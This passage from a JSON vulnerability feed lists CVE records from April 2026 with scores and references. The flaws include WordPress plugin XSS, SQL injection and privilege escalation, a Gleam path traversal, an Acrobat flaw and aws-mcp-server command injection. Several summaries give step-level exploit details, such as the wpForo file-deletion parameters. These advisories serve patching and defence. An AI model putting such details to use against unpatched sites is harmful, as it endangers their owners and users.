product.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00201,"ranking_epss":0.42244,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AnalogyC0de/public_exp/issues/30","https://vuldb.com/submit/782279","https://vuldb.com/vuln/356968","https://vuldb.com/vuln/356968/cti"],"published_time":"2026-04-12T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6106","summary":"A vulnerability was detected in 1Panel-dev MaxKB up to 2.2.1. This vulnerability affects the function StaticHeadersMiddleware of the file apps/common/middleware/static_headers_middleware.py of the component Public Chat Interface. The manipulation of the argument Name results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used. Upgrading to version 2.8.0 is able to resolve this issue. The patch is identified as 026a2d623e2aa5efa67c4834651e79d5d7cab1da. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00033,"ranking_epss":0.09303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/","https://github.com/1Panel-dev/MaxKB/commit/026a2d623e2aa5efa67c4834651e79d5d7cab1da","https://github.com/1Panel-dev/MaxKB/pull/4919","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/AnalogyC0de/public_exp/issues/23","https://vuldb.com/submit/781810","https://vuldb.com/vuln/356965","https://vuldb.com/vuln/356965/cti"],"published_time":"2026-04-11T23:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6105","summary":"A security vulnerability has been detected in perfree go-fastdfs-web up to 1.3.7. This affects an unknown part of the file src/main/java/com/perfree/controller/InstallController.java of the component doInstall Interface. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00038,"ranking_epss":0.11238,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitee.com/ying-xiujie/cve/issues/IGB6M9","https://vuldb.com/submit/781598","https://vuldb.com/vuln/356964","https://vuldb.com/vuln/356964/cti"],"published_time":"2026-04-11T22:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31845","summary":"A reflected cross-site scripting (XSS) vulnerability exists in Rukovoditel CRM version 3.6.4 and earlier in the Zadarma telephony API endpoint (/api/tel/zadarma.php). The application directly reflects user-supplied input from the 'zd_echo' GET parameter into the HTTP response without proper sanitization, output encoding, or content-type restrictions.\n\nThe vulnerable code is:\n\nif (isset($_GET['zd_echo'])) exit($_GET['zd_echo']);\n\nAn unauthenticated attacker can exploit this issue by crafting a malicious URL containing JavaScript payloads. When a victim visits the link, the payload executes in the context of the application within the victim's browser, potentially leading to session hijacking, credential theft, phishing, or account takeover.\n\nThe issue is fixed in version 3.7, which introduces proper input validation and output encoding to prevent script injection.","cvss":9.3,"cvss_version":4.0,"cvss_v2":6.4,"cvss_v3":9.3,"cvss_v4":9.3,"epss":0.00017,"ranking_epss":0.03937,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://forum.rukovoditel.net/viewtopic.php?p=22499#p22499"],"published_time":"2026-04-11T19:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23900","summary":"Various stored XSS vulnerabilities in the maps- and icon rendering logic in Phoca Maps component 5.0.0-6.0.2 have been discovered.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08133,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://phoca.cz/"],"published_time":"2026-04-11T14:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32146","summary":"Improper path validation vulnerability in the Gleam compiler's handling of git dependencies allows arbitrary file system modification during dependency download.\n\nDependency names from gleam.toml and manifest.toml are incorporated into filesystem paths without sufficient validation or confinement to the intended dependency directory, allowing attacker-controlled paths (via relative traversal such as ../ or absolute paths) to target filesystem locations outside that directory. When resolving git dependencies (e.g. via gleam deps download), the computed path is used for filesystem operations including directory deletion and creation.\n\nThis vulnerability occurs during the dependency resolution and download phase, which is generally expected to be limited to fetching and preparing dependencies within a confined directory. A malicious direct or transitive git dependency can exploit this issue to delete and overwrite arbitrary directories outside the intended dependency directory, including attacker-chosen absolute paths, potentially causing data loss. In some environments, this may be further leveraged to achieve code execution, for example by overwriting git hooks or shell configuration files.\n\nThis issue affects Gleam from 1.9.0-rc1 until 1.15.4.","cvss":8.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.3,"epss":0.00015,"ranking_epss":0.03088,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cna.erlef.org/cves/CVE-2026-32146.html","https://github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf","https://github.com/gleam-lang/gleam/commit/2dc0467f822c75de94697a912755d172928ee40a","https://github.com/gleam-lang/gleam/security/advisories/GHSA-vq5j-55vx-wq8j","https://osv.dev/vulnerability/EEF-CVE-2026-32146"],"published_time":"2026-04-11T14:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5809","summary":"The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.2. This is due to a two-step logic flaw: the topic_add() and topic_edit() action handlers accept arbitrary user-supplied data[*] arrays from $_REQUEST and store them as postmeta without restricting which fields may contain array values. Because 'body' is included in the allowed topic fields list, an attacker can supply data[body][fileurl] with an arbitrary file path (e.g., wp-config.php or an absolute server path). This poisoned fileurl is persisted to the plugin's custom postmeta database table. Subsequently, when the attacker submits wpftcf_delete[]=body on a topic_edit request, the add_file() method retrieves the stored postmeta record, extracts the attacker-controlled fileurl, passes it through wpforo_fix_upload_dir() which only rewrites legitimate wpforo upload paths and returns all other paths unchanged, and then calls wp_delete_file() on the unvalidated path. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files writable by the PHP process on the server, including critical files such as wp-config.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09969,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/Actions.php#L746","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/Actions.php#L761","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/PostMeta.php#L402","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/PostMeta.php#L421","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/PostMeta.php#L523","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/classes/Posts.php#L1961","https://plugins.trac.wordpress.org/browser/wpforo/tags/3.0.2/includes/functions.php#L2641","https://plugins.trac.wordpress.org/changeset/3503313/wpforo","https://www.wordfence.com/threat-intel/vulnerabilities/id/0e46ac8d-89ee-4480-bb96-83f2044a4323?source=cve"],"published_time":"2026-04-11T08:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"adobe","product":"acrobat_dc","version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"adobe","product":"acrobat_reader_dc","version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"apple","product":"macos","version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"microsoft","product":"windows","version":null},{"cve_id":"CVE-2026-34621","summary":"Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.06081,"ranking_epss":0.90769,"kev":true,"propose_action":"Adobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.","ransomware_campaign":"Unknown","references":["https://helpx.adobe.com/security/products/acrobat/apsb26-43.html","https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34621"],"published_time":"2026-04-11T07:16:03","vendor":"adobe","product":"acrobat","version":null},{"cve_id":"CVE-2026-5226","summary":"The Optimole – Optimize Images in Real Time plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL paths in versions up to, and including, 4.2.3 This is due to insufficient output escaping on user-supplied URL paths in the get_current_url() function, which are inserted into JavaScript code via str_replace() without proper JavaScript context escaping in the replace_content() function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00099,"ranking_epss":0.2705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/admin.php#L1012","https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/manager.php#L459","https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/manager.php#L542","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/admin.php#L1012","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/manager.php#L459","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/manager.php#L542","https://plugins.trac.wordpress.org/changeset/3498040/optimole-wp/trunk/inc/manager.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Foptimole-wp/tags/4.2.3&new_path=%2Foptimole-wp/tags/4.2.4","https://www.wordfence.com/threat-intel/vulnerabilities/id/112cea93-fa4b-4692-8c8b-e74255f61939?source=cve"],"published_time":"2026-04-11T02:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3498","summary":"The BlockArt Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'clientId' block attribute in all versions up to, and including, 2.2.15. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/blockart-blocks/tags/2.2.15/includes/BlockTypes/PostTemplate.php#L67","https://plugins.trac.wordpress.org/browser/blockart-blocks/tags/2.2.15/includes/BlockTypes/QueryLoop.php#L43","https://plugins.trac.wordpress.org/changeset?old_path=%2Fblockart-blocks/tags/2.2.15&new_path=%2Fblockart-blocks/tags/2.3.0","https://www.wordfence.com/threat-intel/vulnerabilities/id/7d0cb432-785a-4f38-830f-72b95e65aa5a?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4895","summary":"The GreenShift - Animation and Page Builder Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 12.8.9 This is due to insufficient input sanitization and output escaping in the gspb_greenShift_block_script_assets() function. The function uses str_replace() to insert 'fetchpriority=\"high\"' before 'src=' attributes when processing greenshift-blocks/image blocks with the disablelazy attribute enabled. Because this replacement operates on the entire HTML string without parsing, contributors can inject the string 'src=' into HTML attribute values (such as class attributes). When the str_replace executes, the double quotes in the replacement string break out of the attribute context, allowing injection of malicious HTML attributes like onfocus with JavaScript payloads. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10423,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/greenshift-animation-and-page-builder-blocks/tags/12.8.6/init.php#L866","https://plugins.trac.wordpress.org/browser/greenshift-animation-and-page-builder-blocks/tags/12.8.6/init.php#L889","https://plugins.trac.wordpress.org/browser/greenshift-animation-and-page-builder-blocks/trunk/init.php#L866","https://plugins.trac.wordpress.org/browser/greenshift-animation-and-page-builder-blocks/trunk/init.php#L889","https://plugins.trac.wordpress.org/changeset/3494855/greenshift-animation-and-page-builder-blocks/trunk/init.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Fgreenshift-animation-and-page-builder-blocks/tags/12.8.9&new_path=%2Fgreenshift-animation-and-page-builder-blocks/tags/12.9.0","https://www.wordfence.com/threat-intel/vulnerabilities/id/6e3ae3c6-a7d1-46f0-a006-996c1fbe7c7e?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4979","summary":"The UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP plugin for WordPress is vulnerable to blind Server-Side Request Forgery in all versions up to, and including, 1.2.58. This is due to insufficient URL origin validation in the process_image_crop() method when processing avatar/banner image crop operations. The function accepts a user-controlled URL via the uwp_crop POST parameter and only validates it using esc_url() for sanitization and wp_check_filetype() for extension verification, without enforcing that the URL references a local uploads file. The URL is then passed to uwp_resizeThumbnailImage() which uses it in PHP image processing functions (getimagesize(), imagecreatefrom*()) that support URL wrappers and perform outbound HTTP requests. This makes it possible for authenticated attackers with subscriber-level access and above to coerce the WordPress server into making arbitrary HTTP requests to attacker-controlled or internal network destinations, enabling internal network scanning and potential access to sensitive services.","cvss":5.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.0,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08927,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AyeCode/userswp/commit/ca0c81b9c76a26c5ac78a8f3604cf9122a7a4aa1","https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.55/includes/class-forms.php#L198","https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.55/includes/helpers/misc.php#L136","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/class-forms.php#L198","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/helpers/misc.php#L136","https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd2b3fd-1bca-4611-9753-ccb57b0e36a4?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5144","summary":"The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.9.3. This is due to the group blog settings handler accepting the `groupblog-blogid`, `default-member`, and `groupblog-silent-add` parameters from user input without proper authorization checks. The `groupblog-blogid` parameter allows any group admin (including Subscribers who create their own group) to associate their group with any blog on the Multisite network, including the main site (blog ID 1). The `default-member` parameter accepts any WordPress role, including `administrator`, without validation against a whitelist. When combined with `groupblog-silent-add`, any user who joins the attacker's group is automatically added to the targeted blog with the injected role. This makes it possible for authenticated attackers, with Subscriber-level access and above, to escalate any user (including themselves via a second account) to Administrator on the main site of the Multisite network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00049,"ranking_epss":0.14879,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/boonebgorges/bp-groupblog/commit/b824593add9e2c53ef4f0d2e0824d4de0785411f","https://plugins.trac.wordpress.org/browser/bp-groupblog/tags/1.9.3/bp-groupblog.php#L190","https://plugins.trac.wordpress.org/browser/bp-groupblog/tags/1.9.3/bp-groupblog.php#L220","https://plugins.trac.wordpress.org/browser/bp-groupblog/tags/1.9.3/bp-groupblog.php#L450","https://plugins.trac.wordpress.org/browser/bp-groupblog/trunk/bp-groupblog.php#L190","https://plugins.trac.wordpress.org/browser/bp-groupblog/trunk/bp-groupblog.php#L220","https://plugins.trac.wordpress.org/browser/bp-groupblog/trunk/bp-groupblog.php#L450","https://www.wordfence.com/threat-intel/vulnerabilities/id/8129046a-5aa5-4644-babc-0eca9aa524d2?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5207","summary":"The LifterLMS plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 9.2.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Instructor-level access and above who have the edit_post capability on the quiz, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07436,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/lifterlms/trunk/includes/admin/reporting/tables/llms.table.quiz.non.attempts.php#L190","https://plugins.trac.wordpress.org/browser/lifterlms/trunk/includes/admin/reporting/tables/llms.table.quiz.non.attempts.php#L240","https://plugins.trac.wordpress.org/browser/lifterlms/trunk/includes/class.llms.ajax.handler.php#L243","https://plugins.trac.wordpress.org/changeset/3495818/lifterlms/trunk/includes/admin/reporting/tables/llms.table.quiz.non.attempts.php","https://www.wordfence.com/threat-intel/vulnerabilities/id/43d31d1e-0f4f-4f51-8274-650151642d03?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5217","summary":"The Optimole – Optimize Images | Convert WebP & AVIF | CDN & Lazy Load | Image Optimization plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.2.2. This is due to insufficient input sanitization and output escaping on the user-supplied 's' parameter (srcset descriptor) in the unauthenticated /wp-json/optimole/v1/optimizations REST endpoint. The endpoint validates requests using an HMAC signature and timestamp, but these values are exposed directly in the frontend HTML making them accessible to any visitor. The plugin uses sanitize_text_field() on the descriptor value of rest.php, which strips HTML tags but does not escape double quotes. The poisoned descriptor is then stored via transients (backed by the WordPress options table) and later retrieved and injected verbatim into the srcset attribute of tag_replacer.php without proper escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages that will execute whenever a user accesses the injected page.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00078,"ranking_epss":0.23115,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/rest.php#L1008","https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/rest.php#L159","https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/tag_replacer.php#L526","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/rest.php#L1008","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/rest.php#L159","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/tag_replacer.php#L526","https://www.wordfence.com/threat-intel/vulnerabilities/id/50417068-339a-4ae5-9c90-8f08f54ce0af?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3358","summary":"The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized private course enrollment in all versions up to, and including, 3.9.7. This is due to missing post_status validation in the `enroll_now()` and `course_enrollment()` functions. Both enrollment endpoints verify the nonce, user authentication, and whether the course is purchasable, but fail to check if the course has a `private` post_status. This makes it possible for authenticated attackers with Subscriber-level access or above to enroll in private courses by sending a crafted POST request with the target course ID. The enrollment record is created in the database and the private course title and enrollment status are exposed in the subscriber's dashboard, though WordPress core access control prevents the subscriber from viewing the actual course content (returns 404). Enrollment in private courses should be restricted to users with the `read_private_posts` capability.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00059,"ranking_epss":0.18383,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L134","https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2066","https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2053","https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2989","https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classes/Course.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8","https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-7228-4253-bb28-2c2e11af76fd?source=cve"],"published_time":"2026-04-11T02:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3371","summary":"The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authorization checks in the `save_course_content_order()` private method, which is called unconditionally by the `tutor_update_course_content_order` AJAX handler. While the handler's `content_parent` branch includes a `can_user_manage()` check, the `save_course_content_order()` call processes attacker-supplied `tutor_topics_lessons_sorting` JSON without any ownership or capability verification. This makes it possible for authenticated attackers with Subscriber-level access or above to detach lessons from topics, reorder course content, and reassign lessons between topics in any course, including admin-owned courses, by sending a crafted AJAX request with manipulated topic and lesson IDs.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07944,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1687","https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1755","https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L252","https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8","https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf0430-8577-449a-aefe-d7bf606fe2de?source=cve"],"published_time":"2026-04-11T02:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5055","summary":"NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine.  An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the NoMachine Device Server. The product loads a library from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-28494.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02584,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-249/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5058","summary":"aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the MCP server. Was ZDI-CAN-27968.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.01013,"ranking_epss":0.77138,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-246/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5059","summary":"aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the MCP server. Was ZDI-CAN-27969.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.01013,"ranking_epss":0.77138,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-245/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5493","summary":"Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDSPRJ files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25718.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14093,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-255/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5494","summary":"Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of PDSPRJ files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25719.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14093,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-256/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5495","summary":"Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of PDSPRJ files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was 